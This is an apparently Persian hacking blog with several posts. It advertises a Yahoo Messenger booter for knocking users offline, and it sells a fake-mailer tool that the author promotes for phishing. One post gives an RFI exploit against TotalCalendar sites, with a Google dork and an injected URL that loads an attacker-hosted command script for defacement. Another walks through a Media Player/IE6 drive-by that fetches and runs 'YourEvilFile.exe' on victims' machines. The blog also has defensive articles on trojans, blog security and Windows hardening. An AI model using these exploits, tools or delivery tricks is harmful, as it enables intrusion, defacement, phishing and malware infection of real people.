•´¯`¤._ بهترین برنامه های هک _.¤´¯`•

اموزش نفوز به سرور ها وسایت ها برای هک و دیفیس

فروشگاه نایاب مارکت

هم اکنون فروشگاه نایاب مارکت بزرگترین فروشگاه اینترنتی می

باشد. ورود شما کاربر گرامی را خیر مقدم می گوییم

 

http://www.nayabmarket.org

 

+ نوشته شده در  جمعه سیزدهم بهمن 1391ساعت 15:37  توسط ّFUZZER  | 

FuzzerBooterV.1.1

 سلام دوستان عزیز و کاربران محترم شرمنده که چند ماهی نبودم و نتونستم وبلاگ رو اپدیت کنم. امروز بوتر قدرتمند FuzzerBooter رو اوردم که ورژن جدیدش است که با تغییراتی در اون تقریبا کاملش کردم.

 در این بوتر من از Packet های جدید یاهو که تازه به بازار اومده استفاده کردم!

 از امکانات این بوتر میشه به موارد زیر اشاره کرد:

 این بوتر با 500 ایدی لاگین میشه.اپدیت شدن سرورهای جدید یاهو برای لاگین کردن ایدی ها. بوت کردن ایدی در حین استفاده از انتی بوترهایی مثل : Yahaven,YaZak,YehElite و .... .

DC کردن ایدی با سرعت بالا.فرستادن پیام دلخواه به ایدی مورد نظر و ... .

چند نکته مهم برای استفاده از این بوتر :

توجه داشته باشید که برای بوت کردن Victim باید با ایدی های زیادی لاگین کنید.حداقل باید با 20 ایدی لاگین کنید.

نکته بعدی سرعت شما است که برای بوت کردن باید سرعت بالایی داشته باشید.

سورس این برنامه به صورت کامل می باشد و فروشی است دوستانی که علاقه به دریافت سورس این برنامه داردند با من تماس بگیرید. Y! ID : javid.nofozgar))

عکسی از برنامه :

 

برای دانلود برنامه به ادامه مطلب بروید.


ادامه مطلب
+ نوشته شده در  دوشنبه شانزدهم شهریور 1388ساعت 13:58  توسط ّFUZZER  | 

Fake Mailer By Fuzzer

 سلام دوستان بعد از ماه ها اپدیت نشدن وبلاگ دوباره اومدم.در این پس قصد دارم برنامه قدرتمند FakeMailer  رو به شما معرفی کنم.شما توسط این برنامه می تونید ایمیل جعلی ارسال کنید.این برنامه کاربرد زیادی دارد به خاطر اینکه ایمیل جعلی ارسال می کنه.از این برنامه در کارهای فیشیدگ هم میشه به صورت حرفه ای استفاده کرد.این برنامه 100% تست شده و هیچ مشکلی ندارد.قیمت این برنامه فقط 5000 تومان می باشد.این برنامه فقط به 20 نفر فروخته می شود به خاطر اینکه پهنای باند برنامه پایین نیاد و کاربرها بدون هیچ محدودیتی از برنامه استفاده کنند.این برنامه تا الان به 4 نفر فروخته شده است و هیچ نارضایتی نداشتند و مشکلی پیش نیومده.

 عکسی از برنامه :

 عکس هایی از عملکرد برنامه :

 

 برای دیدن عکس ها در سایز واقعی انها رو ذخیره کنید 

برای دریافت اطلاعاتی از قبیل واریز پول و دریافت برنامه با ایمیل

Fuzzer_Hackingtools@yahoo.com

تماس بگیرید. 

راستی یه کی لاگر قدرتمند هم دارم می نویسم تقریبا 90% برنامه به پایان رسیده. منتظر باشید

 

+ نوشته شده در  پنجشنبه هشتم اسفند 1387ساعت 20:4  توسط ّFUZZER  | 

مقاله ای درباره امنیت وبلاگها

مقاله ای درباره امنیت وبلاگها

 

همانطور که میدانید و اطلاع دارید جدیدا هک شدن وبلاگها توسط هکر ها رایج شده است.

به طوری که هر هکر یا گروه هکری کار هک خود را با هک وبلاگ ها آغاز میکند.

وبلاگ نیز میتوان گفت یک سایت رایگان است ولی آیا امنیت این وبلاگها بر عهده کیست؟

میتوان به اطمینان گفت 99%امنیت وبلاگها در دست صاحبان وبلاگ است.

 

ولی هکر ها چگونه وبلاگهای ما رو هک میکنند؟

 

1- هک کردن ایمیل صاحب وبلاگ

به طوری که هکر ایمیل صاحب وبلاگ را هک کرده بعد برای ورود به وبلاگ به قسمت فراموش کردن پسورد وبلاگ میرود.

در این قسمت باید ایمیل صاحب وبلاگ زده شه تا پسورد وبلاگ به این ایمیل انتقال پیدا کند.پس هکر با در دست داشتن نام وبلاگ و داشتن پسورد ایمیل شما میتواند خیلی راحت به وبلاگتان دست رسی پیدا کند.

2- ایمیل جعلی

حیله دیگر هکر ها فرستادن ایمیل جعلی برای صاحبان وبلاگ است.به گونه ای که به طور دروغ خودشان را صاحب ارائه دهنده سرویس وبلاگشان معرفی میکنند و میخواهند از آنها که پسورد خود را برای آنها ایمیل کنید.

3-استفاده از صفحه های تقلبی

بعضی مواقع به شما آدرسهای نا آشنا پیشنهاد میشود.بعد از باز کردن این آدرس ها صفحه ای شبیه صفحه لاگین(صفحه ورودی به وبلاگ شما که یوزر نیم و پسورد را میخواهد)باز میشود.ولی آیا هر صفحه شبیه به آن صفحه لاگین ما باید مشخصاتمان را وارد نماییم.؟؟؟؟خیر.زیرا امکان دارد این مشخصات ما برای افراد غیر معتمد فرستاده شود.

4-استفاده از باگهای

گاهی اوقات سرویس دهنده های وبلاگ نمیتوانند آن طور که باید امنیتشان را تامین کنند برای همین با پیدا شدن چند باگ (حفره امنیتی) راه هک کردن را برای هکر ها را باز میکنند.

ولی این امر خیلی کم دیده میشود و میتوان گفت امکان چنین اتفاقی خیلی به ندرت دیده میشود.

 

ولی راههای جلوگیری از هک شدن وبلاگهایمان:

 

1-در مرحله اول سعی کنید وبلاگ خود را از یک سرویس دهنده مطمئن و مناسب انتخاب نمایید

2-در نگه داشتن ایمیل خود توجه داشته باشید.(مقالات قبلی به این مبحث اشاره شده است)

3-این را بدانید هرگز و تحت هیچ شرایطی صاحبان سرویس دهنده از شما پسورد وبلاگتان را نمیخواهند.

4-همیشه سعی کنید همه موارد صفحه لاگین(آدرس بار و...)را کاملا چک کرده بعد یوزر نیم و پسورد خودتان را وارد نمایید

5-سعی کنید از یک پسورد مناسب استفاده کنید(اشاره شده در مقالات قبلی)

6-سعی کنید همیشه در پر کردن لیست اسم نویسی برای وبلاگ ایمیل با آی دی که در مسنجر از آن استفاده مینمایید تفاوت داشته باشد.

استفاده و مد نظر گرفتن موارد بالا درصد هک شدن وبلاگ خود را تا حد زیادی کاهش داده اید.

+ نوشته شده در  جمعه نهم فروردین 1387ساعت 18:40  توسط ّFUZZER  | 

معرفی و مقابله با تروجان ها

معرفی و مقابله با تروجان ها

 

اگر  اهل گشت و گذار در اینترنت مخصوصا سایتهای امنیتی و یا هکری باشید حتمی با واجه تروجان آشنا هستید.

شاید برداشت اکثریت ما از این واجه همان ویروس اینترنتی باشد.

ولی تروجان چیست؟

اگر بخواهیم برای تروجان یک تعریف ساده بیان کنیم میتوانیم بگوییم:

"تروجان یک فایل جاسوسی میباشد که توسط هکر با توجه به نیاز به اطلاعاته قربانی آماده میشود و برای قربانی فرستاده میشود"

با کمی دقت در تعریف تروجان در می یابیم که تروجان هیچ وقت نمیتواند یک ویروس باشد.

هکر با توجه به نیاز های خود به اطلاعات قربانی که میتواند این اطلاعات:پسورد ایمیل یا ایدی قربانی,اشتراک اینترنت(اکانت),نام و پسورد کامپیوتر قربانی و ... میباشد تنظیم میکند.

معمولا تروجانها به دو قسمت تقسیم میشوند:

1-کلاینت:که تنظیمات را انجام داده و آن را با توجه به نیازهایی که بیان کردیم تنظیم مینمایند

2-سرور:که بعد از تنظیمات باید این سرور برای قربانی فرستاده شود تا قربانی بعد از دریافت آن را اجرا کند.

با توجه به تحقیقاتی که داشتم میتوانم بگویم هر هکری کار خود را با این نوع کارها شروع میکند.یعنی با تنظیم ترجان,فرستادن تروجان برای قربانی,هک کردن ایدی و اکانت اینترنت و....

در اوایل ورود این نوع جاسوسها به اینترنت فقط کارایی محدودی داشتند.همه کارایی آن نوع تروجانها به فرستادن پسورد یاهو ختم میشد.

با گذشت زمان و علاقه برنامه نویسان به این نوع جاسوس ها کم کم امکانات آن را افزایش دادند تا به امروز.

ولی امکانات یک تروجان امروزی چیست؟

تروجانهای امروزی میتوانم بگویم دیگر رشد کامل خود را تا حد زیادی طی نموده است امکان دارد با ورود یک تروجان به کامپیوتر شما:

1-فرستاده شدن پسورد ای دی مخصوصا ایدی و پسورد مسنجر شما برای هکر(به ایمیل هکر یا ایدی یا یک اف تی پی مشخص شده توسط هکر)

2-فرستاده شدن اکانت اینترنت شما برای هکر

3-فرستاده شدن نام کامپیوتر شما همراه با پسورد ویندوز برای هکر

4-محدود کردن کارهای شما با کامپیوتر(قفل شدن Task Manager یا Mscoing یا Rigistry و...) کامپیوتر شما توسط هکر

5-از کار انداختن ویروس کش و فایروال کامپیوتر شما

6-در اختیار داشتن هارد شما توسط هکر(پاک کردن فایل از کامپیوتر شما و یا اضافه کردن فایل توسط هکر)

بله همه اینها که خوندید امکان دارد.فقط کافیست یک تروجان روی کامپیوتر شما توسط هکر فعال شود.

ولی چگونه امکان دارد که تروجان وارد کامپیوتر ما شود:

1-در حال چت کردن هستید فرد مقابل برایتان میخواهد عکس خودش یا نرم افزاری را سند کند .شما آن را میگیرید ولی آیا این فایل سالم است.از کجا مطمئن هستید که حاوی تروجان نیست؟

2-در حال گشت در یک سایت آموزش هک هستید میخواهید یک نرم افزار دانلود کنید از کجا مطمئن هستید که این نرم افزار سالم است؟

3-برایتان یک ایمیل میاید.ایمیلی که فرستنده آن نامشخص است ایا ایمیل سالم است؟

و...

تروجان ها بر خلاف ویروس ها که فقط شامل چند شکل محدود میشوند دارای اشکال خیلی زیادی هستند.

یک تروجان میتواند خود را به شکلهای: عکس,یک فایل صوتی,یک فایل نقاشی,یک فایل Setup و....

پس میبینید تروجان یک شکل مخصوص ندارد .

چگونه متوجه شویم که در کامپیوتر ما تروجان فعال است:

1-در صورت از کار افتادن Task Manager و Msconfig

2-از کار افتادن ویروس کش

3-تغییر در شکل توپی پسورد در مسنجر ویا سیو نشدن آن

4-در صورت دیدن علائم مشکوک در مسنجر(باز و بسنه شدن یک پنجره پی ام)

5-فعال بودن نرم افزار های مشکوک مثل Task Manager و Msconfig

6-خوانده شدن ایمیل های که ما آنها را قبلا نخوانده ایم در ایمیلمان

ولی ما برای مقابله با این نوع جاسوسها چه کارهایی باید انجام دهیم؟

1-داشتن یک ویروس کش قوی و به روز

2-داشتن یک فایروال خوب یا فعال کردن فایروال خود ویندوز(در مقالات بعدی این مبحث پرداخته میشود)

3-این را بدانید همیشه پسوند عکس ((jpg,gif,.. میباشد و هیچ وقت یک عکس دارای پسوند exe  نمیباشد و همیشه اگر فایل(عکس,نوشته و...) را گرفتید که داری پسوند مشکوک بود هرگز باز نکنید

4-همیشه Task Manager و Msconfig خود را چک کنید اگر چیزی مشکوک دیدید مثل sender.exeبروید و در درایو ویندوز پوشه windows/system32دنباله چنین فایلی باشید که مشکوک بود و آن را پاک کنید

5-هر گز از کسی که شناخت کافی ندارید فایلی دریافت نکنید

6-سعی کنید اگر میخواهید نرم افزار دانلود کنید از سایتهای معتبر دانلود کنید.

7-در صورت مشکوک شدن به وجود تروجان سریع اطلاعات خود را عوض کنید(پسورد ای دی,پسورد ویندوز و...)

8-سعی کنید ویندوز خود را عوض کنید و درایو ویندوز قبلی را فرمت کنید.

در مقالات بعدی به شما خواهیم گفت چگونه برای خود پسورد انتخاب نمایید که امکان هک شدنتان را تا حد امکان کم کند

 

امیدوارم این مقاله توانسته باشد شما را تا حدی با تروجان و راههای مقابله با آن آشنا کرده باشد

   

 

 

 

 

 

 

 

+ نوشته شده در  جمعه نهم فروردین 1387ساعت 18:39  توسط ّFUZZER  | 

ایمن سازی سریع در Windows2000&server2003

ایمن سازی سریع در Windows2000&server2003

 

در اين مقاله سعي شده كه امنيت در يكي از محبوبترين سيستم عاملهاي ارائه شده توسط شركت مايكروسافت ، به اجمال و به صورت قدم به قدم مورد بررسي قرار بگيرد . اگرچه بررسي امنيت يك سيستم عامل در يك مقاله ، كار دشواري مي باشد ، اما مي توان از اين مقاله به عنوان يك مرجع سريع و check list استفاده نمود .

بطور كل ايمن سازي يك سيستم عامل براي ايفاي نقش سرويس دهنده در شبكه را مي توان به سه بخش تقسيم نمود كه دو بخش اول ضروري و بخش سوم بنابر احتياج مي تواند اجرا شود . براي شروع فرايند ايمن سازي بعد از نصب سيستم عامل ، مي توانيد اين مراحل را قدم به قدم به شرح ذيل اجرا نماييد .

بخش اول : ايمن سازي پايه

يكي از ابزارهاي اصلي در امنيت ، تشخيص هويت يا
Authentication مي باشد . اين ابزار ، در تمامي پروسه هايي كه احتياج به امنيت دارند ، به عنوان اولين مرحله در ايجاد حداقل ترين لايه امنيتي ، به كار برده ميشود . authentication از زمان تولد - كه احتمالاً قبل از تولد حضرت مسيح (ع) بوده - ، تا كنون ، دستخوش تحولات و پيشرفت هاي زيادي گرديده و هر روز شاهد ابداع تكنيك ها و تكنولوژي هاي جديد در اين زمينه هستيم .
سيستم عامل به عنوان يكي از اركان اصلي سيستمها و شبكه هاي كامپيوتري ، از
Authentication به عنوان ابزار اصلي تعيين سطوح امنيتي استفاده مي نمايد . بنابرين شروع كار ، با بررسي و ايمن سازي اين بخش خواهد بود .

تعيين استراتژي مربوط به اعتبار سنجي كاربران ، يكي از مهمترين مراحل روند ايمن سازي سيستم عامل مي باشد . سيستم عامل
Windows 2000 & Server 2003 از پروتكلهاي اعتبار سنجي LM , NTLM v1 , NTLM v2 و Kerberos پشتيباني مي كنند . پروتكل پيش فرض Kerberos هست كه نسبت به پروتكلهاي ديگه ايمن تر مي باشد . بنابرين موضوع پر اهميت در بخش اعتبار سنجي ، كنترل سياستهاي مربوط به حسابهاي كاربري و كلمات عبور مي باشد .


قدم اول : ساخت سياستي قدرتمند در استفاده از كلمات عبور


آيتمهايي كه در اين قسمت تنظيم مي شوند به شرح ذيل هستند :

Maximum password age : 30 days

Enforce Password History : 42 passwords rememberd

Minimum password age : 0 day

Minimum password length : 8 characters

Password must meet complexity requriments : Enable


در اين بخش همچنين بايد به كاربران آموزش داده شود كه كلمات عبور خود را به صورت ياد داشت در محل كار خود قرار ندهند .

قدم دوم : ساخت سياستي قدرتمند در استفاده از حسابهاي كاربري

در اين مرحله ، چند تنظيم براي حسابهاي كاربري به شكل زيرانجام مي دهيم :

Account lockout threshold : 3 attempts

Account lockout duration : 0

Reset account lockout counter after : 30 minutes


قدم سوم : كنترل دسترسي ها و مجوزها

اين بخش ، يكي از حساس ترين مراحل ايمن سازي سيستم عامل مي باشد . شرايط با توجه به استفاده از
Active Directory يا عدم استفاده از Domain متفاوت مي باشد . براي اجراي دقيق دسترسي ها و اعمال صحيح مجوزها ، درك صحيح و درست از مجوزهاي استاندارد و خاص و موارد استفاده از آنها ، و همچنين مجوزهاي منابع به اشتراك گذاشته شده ، لازم و ضروري هست .
به طور كل ، مسئله اي كه خيلي مهم هست و بايد قبل از اعمال هر گونه مجوزي در نظر گرفته شود ، ايجاد يك گروه بندي مناسب و صحيح بر اساس نيازهاي سازمان ، شبكه و كاربران مي باشد . اگر اين گروه بندي ها به صورت صحيح ايجاد و مديريت شوند ، اعمال دسترسي ها و مجوزها ، بسيار راحت و تحت كنترل خواهد بود .

Group Policy Management Console امكان مديريت GPO را فراهم نموده است .
هميشه به ياد داشته باشيد كه مجوزها را به گونه اي اعمال نماييد كه نياز كاربران مرتفع شود و بيشتر از آنچه كه نياز هست ، دسترسي داده نشود .

همچنين استفاده از
Security Templates در ايجاد سطوح مختلف امنيتي بر اساس نياز ، مي تواند امر ايمن سازي را تسريع و كنترل نمايد . انواع Security Templates ها و موارد كاربرد آنها به شرح ذيل مي باشند :

Security.inf
الگوي فوق ، الگوي پيش فرض در هنگام نصب مي باشد .

Compatws.inf
اين الگو ، كاربران گروه
Power Users را حذف كرده و يك سطح امنيتي پيش فرض با محدوديت كمتر براي كاربران گروه Users ايجاد مي كند .

Securews.inf and Securedc.inf
اين الگو ، سطح امنيتي بيشتري با اعمال تنظيمات در بخشهاي
Account Policy , Auditing و Registry Key بوجود مي آورد . اين الگو همچنين ، تمامي كاربران عضو گروه Power Users را در windows xp ، حذف مي نمايد .

Hisecws.inf and Hisecdc.inf
اين الگو ، سطح بالايي از امنيت را در ارتباطات شبكه اي بوجود مي آورد .

Rootsec.inf
اين الگو ،مجوزهاي پيش فرض را براي شاخه اصلي سيستم عامل و زير شاخه هاي آن ، به شرطي كه قبلاً به صورت مشخص مجوز براي آنها تنظيم نشده باشد ، را تنظيم مي نمايد .
Iesacls.inf
اين الگو ، براي فعال سازي تنظيمات
registery جهت كنترل امنيت internet explorer به كار گرفته مي شود . اين الگو امنيت IE را افزايش نمي دهد ، بلكه نقطه شروعي براي آغاز ايمن سازي IE مي باشد .

علاوه بر الگوهاي فوق ، سيستم عامل اين امكان را فراهم نموده كه الگوهاي جديد بر اساس نيازها ساخته شود يا الگوهاي فوق تغيير داده شوند .

قدم چهارم : به روز رساني و نصب وصله هاي امنيتي

بدون شك ، به روز رساني و نصب آخرين وصله هاي امنيتي يكي از مراحل بسيار مهم در فرايند ايمن سازي سيستم عامل مي باشد . به روز رساني سيستم عامل به تنهايي ، از طريق
Automatic Update ، بهترين روش براي به روز رساني مي باشد .
اما به روز رساني در شبكه و در سطوح گسترده ، احتياج به تعيين استراتژي و بهرگيري از نرم افزارهايي همچون
SUS يا SMS را دارد .

قدم پنجم : ايمن سازي دسترسي راه دور

چنانچه احتياج به دسترسي راه دور باشد ، اين بخش بايد با دقت و وسواس زياد ، بر روي سرور راه دور و همچنين در صورت لزوم ، بر سرويس گيرنده هاي راه دور اعمال شوند . در اين بخش ، دو قسمت بايد مورد توجه قرار گيرد . ابتدا انتخاب پروتكل مناسب و ايمن براي احراز هويت سرويس گيرنده و در قسمت دوم انتخاب يك پروتكل ايمن ارتباطي براي برقراري ارتباط مطمئن و ايمن شده بين سرويس گيرنده و سرويس دهنده مي باشد .

قدم ششم : ايمن سازي منابع داخلي

در اين بخش بايد اطلاعات حساس بر روي سيستم عامل ، توسط
EFS‌ رمزنگاري و به خوبي محافظت شوند .


بخش دوم : مستحكم سازي سيستم عامل

در اين قسمت ، بايد مراحل تكميلي و مستحكم سازي سيستم عامل انجام شود . اهميت انجام صحيح و دقيق اين بخش فوق العاده زياد است . مستحكم سازي سيستم عامل شامل مراحلي هست كه اين مراحل به شرح ذيل هستند :

قدم هفتم : متوقف كردن سرويسهاي غير مورد نياز

معمولاً هنگام نصب سيستم عامل ، سرويسهايي نصب مي شود . چنانچه به اين سرويسها احتياج نداريد ، بايد حتماً غير فعال شوند .

قدم هشتم : ايمن كردن فايلهاي اجرايي خاص

گروهي از فايلهاي اجرايي بر روي سيستم عامل ، بايد حتماً با مجوزهاي صحيح ، فقط براي مدير سيستم قابل اجرا باشند . مهمترين اين فايلها عبارتند از :

arp.exe – at.exe – attrib.exe – cacls.exe – cmd.execommand.com – debug.exe – dialer.exe – edit.com – finger.exe – ftp.exeipconfig.exe – nbtstat.exe – net.exe – netstat.exe –nslookup.exe – ping.exercp.exe –rdisk.exe – regedit.exe – regedt32.exe – rexec.exe – route.exersh.exe –runonce.exe – sysedit.exe – telnet.exe – tftp.exe – tracert.exexcopy.exe


با مجوز گزاري صحيح بر روي اين فايلها ،بسياري از حملات راه دور با شكست مواجه خواهد شد .

قدم نهم : غير فعال كردن
Subsystems

در صورت عدم نياز به پشتيباني از سيستم عاملهاي ديگر مانند
Netware و OS/2 و... ، سرويسهاي پشتيباني از اين سيستم عاملها را غير فعال نماييد .


قدم دهم : فعال سازي سيستم بازرسي و كنترل

سيستم
Auditing و Logging ‌ در سيستم عامل بايد به درستي راه اندازي و تنظيم شود . بخشهايي كه بايد Auditing بر روي آن تنظيم شود عبارتند از Active Directory ، Registery و Login . همچنين Event Viewer هم بايد براي كنترل و بازرسي رويدادها به درستي تنظيم و فعال شود .

قدم يازدهم : ايمن سازي در پروتكل
TCP/IP

پروتكل
tcp/ip داراي نقاط ضعفي مي باشد كه امكان اجراي حملاتي بر روي اين پروتكل و متوقف كردن سرويس دهي سيستم عامل فراهم مي شود . براي جلوگيري از بروز چنين مشكلاتي بايد تنظيماتي در رجيستري براي استحكام بخشيدن به ساختار ارتباطي انجام شود .

قدم دوازدهم : كنترل سطح ايمني

در اين مرحله ، با استفاده از نرم افزارهايي مانند
MSBA و يا نرم افزارهاي شركت هاي ثالث به عنوان Vulnerability Scanner سطح ايمني سيستم و شبكه را كنترل نموده و چنانچه نقطه ضعفي گزارش گرديد ، اقدام به رفع مشكل مي نماييم .


بخش سوم : امنيت بيشتر با حركت به سوي شبكه هاي
Trust

چنانچه سازمان و شبكه اي احتياج به امنيت در حد بسيار بالايي داشته باشد ، چاره اي جزء حركت به سوي ايجاد شبكه هاي
Trust ندارد . در اين گونه شبكه ها ، تكنولوژي هاي پيشرفته از جمله استفاده از كارتهاي هوشمند ، گواهينامه ها و امضاهاي ديجيتال و پروتكلهاي ارتباطي رمز شده ، به كار گرفته مي شود .
راه اندازي شبكه هاي
Trust بر روي سكوي ويندوز مبحثي جدا مي باشد كه در انجمن Windows Trusted Network ‌ مورد بررسي قرار خواهد گرفت .

امیدوارم از این مقاله خوشتون اومده باشه

 

+ نوشته شده در  پنجشنبه هشتم فروردین 1387ساعت 9:46  توسط ّFUZZER  | 

اکسپلویت برای هک سایت های PHP

اکسپلویت برای هک سایت های PHP

 

این اکسپلویت بر روی یک سیستم تاریخ که بیشتر بر روی سایتهایی که از پی اچ پی ناک PHP NUKE  استفاده میکنند نصب هست.

برای شروع کار در گوگل سرچ کنید

intext:"Powered by TotalCalendar"

سپس بر روی یکی از سایتها کلیک نمایید

بیشتر سایتهایی که پیدا میکنید آدرسی شبیه این دارند

http://www.mysite.com/calendar/%20view_day.php?selectedDate=1143874800  

که شما باید این عبارت رو از آخر آن بردارید

view_day.php?selectedDate=1143874800

و بجای آن بنویسید

index.php?inc_dir=http://www.yourspace.com/yourscript.php?

که بجای این آدرس http://www.yourspace.com/yourscript.php?
بایدفایل cmd رو در هاستی که phpساپورت میکنه آپلود کنید وآدرس اونو بدید بعد از اینکه فایلcmdرو آپلود کردید وآدرس اونو آخر آدرس بالا قرار دادید شما میتونید به cmd  اون سایت دسترسی پیدا کنید که هر دستوری که بلد هستید رو میتونید بدید ویک دیفیس پیج قرار دهید روی سایت با دستور wget
موفق وموید باشید.

+ نوشته شده در  پنجشنبه هشتم فروردین 1387ساعت 9:45  توسط ّFUZZER  | 

چگونه فایل های Exe را درون یک فایل jpg مخفی کنیم؟

 
سلام
دوستان گرامی
در این اموزش روش جدیدی برای
encrypt کردن فایل ها درون یک فایل jpg آموزش داده خواهد شد.

مثال: می خواهیم فایل فشرده ی
nast.rar را درون فایل htc.jpg مخفی کنیم.
هر دو فایل داخل یک مکان مناسب (مثلا درایو
D) کپی می شود. حالا از منوی start گزینه ی run سپس عبارت cmd تایپ می شود. در خط فرمان به درایو یا پوشه ی فایل ها بروید.
حالا تایپ کنید:

copy /b htc.jpg + nast.rar htctytn.jpg                                           

و کلید enter را فشار دهید.
مشاهده می شود که یک فایل جدید با نام
htctytn.jpg ساخته شد. از cmd با تایپ عبارت exit خارج شوید.
به محل فایل ها بروید. حالا می توانید فایل های
htc.jpg و nast.rar را حذف کنید.
فایل
htctytn.jpg را ببینید، مشاهده می کنید همان فایل htc.jpg را نشان می دهد. اما اگر دقت کنید می بینید حجم این فایل بزرگتر از فایل های قبلی است.
برای استخراج فایل ها از فایل
htctytn.jpg از برنامه ی winrar یا 7zip و یا .. مشاهده کنید. روی فایل کلیک راست کرده و گزینه ی extract here را انتخاب کنید. مشاهده می کنید که فایل های قبلی از درون این فایل خارج شدند.

 

امیدوارم از این اموزش خوشتون اومده باشه !!

 

منبع: www.FUZzER.blogfa.com

 

+ نوشته شده در  چهارشنبه بیست و ششم دی 1386ساعت 17:8  توسط ّFUZZER  | 

•´¯`¤._ معنای واقعی هک _.¤´¯`•

 

امروز می خوام هک قربانی رو با استفاده از باگ موجود در مدیا پلیر واستون بگم.


این آموزش بر روی مدیا پلیر ۸ و اینترنت اکسپلورر ۶ کاملا جواب میده و میشه به آسونی قربانیمون رو هک کنیم.

برای این کار ابتدا این فایل رو از لینک زیر دانلود کنید

DOWNLOAD

بعد از این کار فایلی که می خواین در سیستم طرف اجرا بشه رو یه جا آپلود کنید.

فایلی رو که دانلود کردید روبا نوت پد باز کنید و مثل توضیحات زیر عمل کنید.

بجاي قسمت http://YourHost.com/YourEvilFile.exe آدرس فايلي را بنويسيد كه مي خواهيد در كامپيوتر هدف اجرا شود.

اگر هدف شما مديا پلير را در شاخه يا داريوي غير از C:Program FilesWindows Media Playerwmplayer.exe نصب كرده است اين قسمت را نيز تغيير دهيد.(مسیر ورود و اجرای فایل سرور شما بر روی سیستم قربانی)

 
يك فايل ديگر با نام error.jsp تشكيل دهيد و داخل آن هر كد html كه مي خواهيد قرار دهيد. چون هدف شما در هنگام دانلود و اجرا شدن فايل صفحه درون فايل error.jsp را مي بيند.


 
حالا فايل html و error.jsp را در يك شاخه روي يك فضا رايگاني كه از يك سرور مثل http://www.angelfire.com/ گرفته ايد آپ لود كنيد.


 
از فايل اجرايي مديا پلير خود wmplayer.exe يك كپي تهيه كنيد چون احتمال دارد خراب شود

 
وارد صفحه html كه ساخته بوديد از طريق اينترنت اكسپلورر شويد. مثلا http://www.angelfire.com/youaccoundname/index.html


 
فايل بدون هيچ اخطاري دانلود شده و بجاي فايل اجرايي مديا پلير ميشيند و سپس اجرا مي شود

امیدوارم استفاده لازم رو برده باشید

 

منبع : www.FUzZER.blogfa.com

+ نوشته شده در  سه شنبه بیست و پنجم دی 1386ساعت 20:13  توسط ّFUZZER  | 

NMAP?

 

Nmap  چیست؟

 

Nmap مخفف Network Mapper میباشد و یک نرم افزار کاربردی برای جستجوی شبکه یا ممیزی امنیتی شبکه به شمار میاید. این نرم افزار طوری طراحی شده که شبکه های بزرگ را به سرعت اسکن کند، اگر چه می تواند بر روی سیستم های تنها نیز بخوبی کار کند. Nmap از ip packet های خام بصورت منحصر بفرد استفاده می کند تا تعیین کند چه رایانه هایی (hosts) بر روی شبکه در دسترس می باشند، چه سرویسهایی (ports) ارائه می کنند، چه سیستم عاملهایی (بهمراه نسخهٔ سیستم عامل) بر روی آنها در حال اجرا می باشد، چه نوع packet filter ها / فایروالهایی مورد استفاده قرار گرفته و چندین پارامتر دیگر. Nmap بر روی اکثر رایانه ها، هم گرافیکی و هم کنسول ها قابل استفاده است. Nmap یک نرم افزار مجانی است که به همراه کدهای آن تحت واژهٔ GNU GPL در دسترس می باشد.

ویژگیهای Nmap
 
انعطاف پذیری
از چندین تکنیک پیشرفته برای استخراج نقشهٔ شبکه استفاده می کند که این نقشه از IP filter ها، فایروالها، مسیریابها و دیگر موانع تشکیل شده است. این نقشه همچنین شامل بسیاری از پورتهای اسکن شده ( هم TCP و هم UDP)، تشخیص سیستم عامل، ping sweep ها و عوامل دیگر می باشد.

 
قدرتمندی
از Nmap جهت اسکن کردن شبکه های بسیار بزرگ به معنی واقعی کلمه، یعنی صدها هزار از ماشین، استفاده شده است.

 
قابلیت حمل
بر روی اکثر سیستم عاملها استفاده می شود و از آن پشتیبانی می کنند. این سیستم عاملها شامل Linux ، Open/Free/Net BSD ، Solaris ، IRIX ، Mac OS ، HP-UX ، Sun OS و غیره می باشد.

 
سادگی
در ضمن اینکه Nmap یک مجموعه از خصوصیات پیشرفته را برای کاربران توانمند ارئه می دهد، شما می توانید استفاده از آن را با دستور “nmap –O –sS targethost” آغاز نمایید. هم نسخه های command line و هم نسخه های گرافیکی (GUI) بر اساس نیاز شما در دسترس می باشد. نسخهٔ باینری نیز برای برای کسانی که مایل به کامپایل کردن کدهای Nmap نیستند موجود می باشد.

 
رایگان
هدف اولیه از پروژهٔ Nmap جهت کمک به امن کردن بیشتر اینترنت و تجهیز مدیران شبکه / ممیزین شبکه (auditors) / هکرها به یک ابزار پیشرفته جهت جستجوی شبکهٔ تحت کنترلشان بوده است. Nmap برای download رایگان به همراه کدهای کامل آن که شما می توانید آنها را تغییر دهید و تحت GNU General Public License (GPL) در اختیار دیگران قرار دهید، در دسترس می باشد.

 
خوب مستند سازی شده
بیشترین تلاش صورت گرفته تا مستندات و manual page ها به روز و قابل فهم باشد. همچنین این مستندات و manual page ها به چندین زبان موجود می باشند.

 
تحت پشتیبانی:
اگرچه این نرم افزار هیچ ضمانتی ندارد، شما می توانید اگر با مشکلی مواجه شدید به آدرس   fyodor@insecure.org ایمیل بزنید.

 
تائید شده
Nmap
جوایز بسیاری برده است، مثل “Information Security Product of the Year” از طرف World and Codetalker Digest.

 
مشهور
همه روزه هزاران نفر از مردم Nmap را download می کنند و این نرم افزار با بسیاری از سیستم عاملها کار میکند.

 

 

نسخه های جدید این برنامه رو می تونید از اینجا دانلود کنید

+ نوشته شده در  سه شنبه بیست و پنجم دی 1386ساعت 20:12  توسط ّFUZZER  | 

مطالب قدیمی‌تر